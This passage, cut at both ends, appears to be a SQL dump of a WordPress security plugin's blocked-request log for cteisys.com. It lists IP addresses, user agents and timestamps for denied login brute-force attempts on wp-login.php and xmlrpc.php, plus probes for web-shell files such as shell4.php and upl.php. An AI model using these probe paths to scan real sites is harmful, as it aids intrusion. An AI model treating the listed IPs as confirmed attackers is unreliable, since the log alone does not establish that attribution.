Firefox\\/96\"}','A7YkBT8lrKo1ezfgvOEuL3S4',0,1663883434.2285,1438,'','POST',403,0,515,0,1,'',0),('57.128.45.42',964701482,'','http://cteisys.com/shell4.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','UAEH82KsSY04i6kLjQwGurJa',0,1663883724.8989,5794,'','GET',403,0,700,0,1,'',0),('57.128.45.42',964701482,'','https://cteisys.com/shell4.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','NhK9FfW1zP3wXZmBOHTRJi24',0,1663883745.3340,274,'','GET',403,0,700,0,1,'',0),('67.205.62.27',1137524251,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','QzoMHjayEwYIWr5KkZi2V8Ff',0,1663883786.4897,5812,'','POST',403,0,600,0,1,'',0),('69.163.224.107',1168367723,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','TGZhErjCat0Bqw78i6YI5nAz',0,1663883828.7028,1201,'','POST',403,0,600,0,1,'',0),('178.128.209.28',2994786588,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rkGtJZYwysfTSveVPzq1xdH3',0,1663883995.7696,2192,'','POST',403,0,515,0,1,'',0),('151.80.20.26',2538607642,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ft5YZiwTzcG21pBJqkL9n8ba',0,1663885171.2133,14672,'','POST',403,0,515,0,1,'',0),('208.113.171.103',3497110375,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','B1ovT6riR4aNq9I5OmLMWkuE',0,1663885206.2380,1905,'','POST',403,0,600,0,1,'',0),('103.130.218.178',1736628914,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','paEGILDiMqH9AW8xwBhJTntb',0,1663885249.2401,1244,'','POST',403,0,600,0,1,'',0),('213.152.162.181',3583550133,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','INP8pfv31SGJcVn5KBtsr9k6',0,1663885274.1481,507,'','POST',403,0,515,0,1,'',0),('150.95.112.79',2522837071,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QHDPTgM8VEKYfwalv9ky6cZj',0,1663885716.2643,1413,'','POST',403,0,515,0,1,'',0),('213.152.187.235',3583556587,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','TkXKJtb4DcuP3IAsHrERZem7',0,1663886141.8348,17858,'','POST',403,0,515,0,1,'',0),('198.244.167.101',3337922405,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','BNjXK9Ce0pkWmDhMnLVt4YFO',0,1663886620.5333,1367,'','POST',403,0,600,0,1,'',0),('157.245.110.251',2650107643,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','i1fZtDVcOKAJ83IMNYrhwjxF',0,1663886662.8395,1187,'','POST',403,0,600,0,1,'',0),('148.72.211.177',2487800753,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dtHMIFqvLVaCQ3r5BmJYigNZ',0,1663886891.9935,1210,'','POST',403,0,515,0,1,'',0),('149.28.159.208',2501681104,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','e47PrUGdzgDViwWAqQanC30B',0,1663887251.2863,517,'','POST',403,0,600,0,1,'',0),('149.28.159.208',2501681104,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','ZusXCxEpHh7ayQzBvRVnYjdI',0,1663887252.8346,481,'','POST',403,0,600,0,1,'',0),('184.168.121.5',3098048773,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mfiy6ajBqMwVHtlDZJshG2NW',0,1663887520.1451,1277,'','POST',403,0,515,0,1,'',0),('213.152.161.244',3583549940,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vZ2ztNSil0jJRFnYhdDqafCI',0,1663887522.2731,585,'','POST',403,0,515,0,1,'',0),('103.226.251.11',1742928651,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','AdoX2ne3DViW8lR7ZrtFEuJ5',0,1663887580.8295,449,'','POST',403,0,600,0,1,'',0),('103.226.251.11',1742928651,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','hIxdweNBTjvc8JVEt94KgsfZ',0,1663887582.0535,485,'','POST',403,0,600,0,1,'',0),('137.184.117.52',2310567220,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','v9SX60BO2juqwTJMm7V5zQnf',0,1663888035.8317,1271,'','POST',403,0,600,0,1,'',0),('103.129.222.91',1736564315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','NucqT4fFkmro6jHvRpyQX7PS',0,1663888079.1006,1249,'','POST',403,0,600,0,1,'',0),('194.233.89.214',3270072790,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','obXhM1SgAV2me43UcNHRrtws',0,1663888101.7425,513,'','POST',403,0,515,0,1,'',0),('43.225.100.101',736191589,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','SOvrIhPFl5Akw01TtRH98Kim',0,1663888946.9186,623,'','POST',403,0,600,0,1,'',0),('43.225.100.101',736191589,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','njZXs5VWrY6kbEv7HCMK1zlR',0,1663888948.6254,575,'','POST',403,0,600,0,1,'',0),('103.121.90.150',1736006294,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','H890NSfCO2xdcjWMgLwI6lQr',0,1663889278.2578,2315,'','POST',403,0,515,0,1,'',0),('45.120.69.121',762856825,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','KMrZ7Si8q4XNvGRhnV629fQ1',0,1663889455.2632,1396,'','POST',403,0,600,0,1,'',0),('68.183.86.247',1152866039,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','Leoh1VmaB7y5lwrgi84UbQFp',0,1663889496.5095,533,'','POST',403,0,600,0,1,'',0),('148.72.244.53',2487809077,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IkaQHiO5dVm6g093pnRwFqsE',0,1663889891.1818,1399,'','POST',403,0,515,0,1,'',0),('8.142.80.20',143544340,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Kj43zGWgOAkFYLPtvHcxubUm',0,1663890557.7410,19653,'','POST',403,0,515,0,1,'',0),('185.2.4.134',3103917190,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','2Al0zZuwiQKS8O1o5sdeINjg',0,1663890881.1480,525,'','POST',403,0,600,0,1,'',0),('75.119.157.181',1266130357,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','7lRn6BuDkWvtY1bCqrgPzVf8',0,1663890923.1597,1216,'','POST',403,0,600,0,1,'',0),('209.97.173.182',3512839606,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ig06HPUIeVMcjXzSTChEqDtQ',0,1663891132.0772,1396,'','POST',403,0,515,0,1,'',0),('107.189.6.184',1807550136,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','MNv4mxcgwLoA93XOBEWjaTGk',0,1663891462.3253,1250,'','POST',403,0,600,0,1,'',0),('198.98.51.74',3328324426,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','2BZfAdRS30oU4WHgbLYqwGFt',0,1663891475.6190,505,'','POST',403,0,600,0,1,'',0),('135.181.60.103',2276801639,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','CFYlaw2BJAZyTI4U7Esci3tS',0,1663891573.2864,505,'','POST',403,0,600,0,1,'',0),('135.181.60.103',2276801639,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','tL0NgqPGR6oHrXIfknQKd9lh',0,1663891574.8175,584,'','POST',403,0,600,0,1,'',0),('8.210.174.93',148024925,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','A2LqmgPnzUH8xGRv50MscwN7',0,1663891742.1507,1602,'','POST',403,0,515,0,1,'',0),('144.217.15.207',2430144463,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','mpRExgvCSTj0PB1hGVUdZzQM',0,1663892354.4695,1576,'','POST',403,0,600,0,1,'',0),('103.8.26.65',1728584257,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vcFQUKe95gYxjyX6kP17LzDT',0,1663892356.2479,482,'','POST',403,0,515,0,1,'',0),('209.141.57.9',3515693321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit\\/537.77.4 (KHTML, like Gecko) Version\\/6.1.5 Safari\\/537.77.4\"}','0DI9aQS53kURbVAEqCoZjchG',0,1663892912.1247,623,'','POST',403,0,600,0,1,'',0),('103.152.164.103',1738056807,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hjBmx8pbO5lQ9DJCPeGqYtIH',0,1663892947.6386,1445,'','POST',403,0,515,0,1,'',0),('103.121.90.150',1736006294,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EyDsz7MhYFfOlo9INTAa0Hxn',0,1663893560.7783,18399,'','POST',403,0,515,0,1,'',0),('67.205.62.27',1137524251,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','TpS7yKXcHal54fMCV8ZQ13nm',0,1663893738.0686,1239,'','POST',403,0,600,0,1,'',0),('144.126.223.177',2424233905,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','5WLyCEoYgVU348rBRNPuhQeK',0,1663893778.8717,1270,'','POST',403,0,600,0,1,'',0),('103.121.90.150',1736006294,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8XsUqDdZagt0nWVIc6xvOLi3',0,1663894182.5050,1329,'','POST',403,0,515,0,1,'',0),('103.7.8.169',1728514217,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','uTy17BIxCkcjib9a8YzpPDOV',0,1663894730.5380,539,'','POST',403,0,600,0,1,'',0),('103.7.8.169',1728514217,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','awzj1IN9bYvSpglDOUrnT5hW',0,1663894732.4196,594,'','POST',403,0,600,0,1,'',0),('111.90.150.28',1868207644,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jiC7ZyfVJso1lBQvFmLhKYWc',0,1663894785.8296,1204,'','POST',403,0,515,0,1,'',0),('94.231.86.20',1592219156,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','dp71WgLqo3iMwzCJt6yjebFI',0,1663895212.6631,1383,'','POST',403,0,600,0,1,'',0),('199.188.207.230',3351039974,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0wOVa2SqRnloQLXCFescbtdH',0,1663895411.8889,2669,'','POST',403,0,515,0,1,'',0),('147.135.255.8',2475163400,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','4muAx2HfZUaDSgwYNtiM58VI',0,1663896597.7292,9486,'','POST',403,0,600,0,1,'',0),('192.71.144.12',3225915404,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','Ync8wjHkEugVqlf7h1QMUS26',0,1663896640.9793,649,'','POST',403,0,600,0,1,'',0),('89.252.138.226',1509722850,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cfge7FZAWdNGBlh2yE8OTwsR',0,1663896641.7934,772,'','POST',403,0,515,0,1,'',0),('194.163.132.194',3265496258,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ADO0WYGnoNTPU5RkQMcth8d9',0,1663897277.9507,1268,'','POST',403,0,515,0,1,'',0),('20.123.164.157',343647389,'','http://cteisys.com//upl.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.2309.372 Safari\\/537.36\"}','wTGj8x7RLCSWrsoadqtJANUp',0,1663897301.4432,345,'','GET',403,0,700,0,1,'',0),('185.2.4.134',3103917190,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','8B3tISCgmsAEXzLFk9vcU0lD',0,1663898016.6723,1307,'','POST',403,0,600,0,1,'',0),('103.129.222.91',1736564315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','N8YtE7kQ9bO0o46GgaLi5rV3',0,1663898063.5540,1278,'','POST',403,0,600,0,1,'',0),('136.243.118.43',2297656875,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','whlJv1rKpyF38DmCOQ7oLekB',0,1663898665.8049,532,'','POST',403,0,600,0,1,'',0),('109.234.161.93',1844093277,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sRZx06d71JHUSpzBCqamElNh',0,1663899169.8183,1614,'','POST',403,0,515,0,1,'',0),('20.101.71.221',342181853,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','dHXV9TK31nSjy0lxJwivL4D8',0,1663899436.8793,3775,'','POST',403,0,600,0,1,'',0),('142.93.54.10',2388473354,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','xZVzKOigCFqelSPuptHbMaJs',0,1663899478.1969,1420,'','POST',403,0,600,0,1,'',0),('162.214.123.41',2731965225,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','ngH5IC08hXZSFfcA3RWsTUJm',0,1663899810.9009,18733,'','POST',403,0,515,0,1,'',0),('142.93.171.58',2388503354,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fwww.cteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fwww.cteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','dt15r6ZIB3iFSG9lkUEjgMAp',0,1663899935.9160,565,'','POST',403,0,600,0,1,'',0),('142.93.171.58',2388503354,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fwww.cteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fwww.cteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','fnBO8TrS2e6zEgMZRmtN3sPV',0,1663899937.3578,520,'','POST',403,0,600,0,1,'',0),('110.40.133.236',1848149484,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','avQPWGpAuZUHwsTO3lDd8bmx',0,1663900421.4604,1505,'','POST',403,0,515,0,1,'',0),('185.9.147.4',3104412420,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','tV1e0TuM6bw39QmBIXj4lyqK',0,1663900517.0684,525,'','POST',403,0,600,0,1,'',0),('185.9.147.4',3104412420,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','N4LXPgYeSpxzr6Uu2AqnWdf7',0,1663900518.8546,638,'','POST',403,0,600,0,1,'',0),('213.142.156.234',3582893290,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','o0qcesSruvY4TpmNGVfHOnKz',0,1663900760.2078,663,'','POST',403,0,600,0,1,'',0),('213.142.156.234',3582893290,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','CvRNWMyBcSewgh3HdOxn0LtA',0,1663900761.7427,527,'','POST',403,0,600,0,1,'',0),('120.78.15.126',2018381694,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','X4BGZu8RgsrJ61YAVj3WSneH',0,1663900857.2268,1550,'','POST',403,0,600,0,1,'',0),('148.72.214.245',2487801589,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','ImW0ejo9Z1Pg8xhEiTBJOQrn',0,1663900898.8696,581,'','POST',403,0,600,0,1,'',0),('103.152.164.103',1738056807,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ly5WDnJCo9dsUI7eXt12FckG',0,1663901013.6731,515,'','POST',403,0,600,0,1,'',0),('15.235.168.187',267102395,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','J4p59NwLHGVcjraMfWQFu3ok',0,1663901756.8655,559,'','POST',403,0,600,0,1,'',0),('103.7.8.169',1728514217,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','1hkoLZOS7p2dglIuE8BJY3ja',0,1663902005.4402,895,'','POST',403,0,600,0,1,'',0),('103.7.8.169',1728514217,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','lDQ946d8TjPiHu7Ufbs13ya0',0,1663902007.6847,652,'','POST',403,0,600,0,1,'',0),('202.29.236.140',3390958732,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','RyxUf4WcA5s6jZuHvIYpBbN3',0,1663902268.5636,1431,'','POST',403,0,600,0,1,'',0),('81.88.52.8',1364734984,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','7pe9dIlGfgsNVQkJCRXnmyBH',0,1663902310.1426,1553,'','POST',403,0,600,0,1,'',0),('61.222.243.149',1038021525,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jST98Z6gbaIiAqUEQh1rNGvF',0,1663902430.3273,666,'','POST',403,0,600,0,1,'',0),('203.112.72.51',3413133363,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 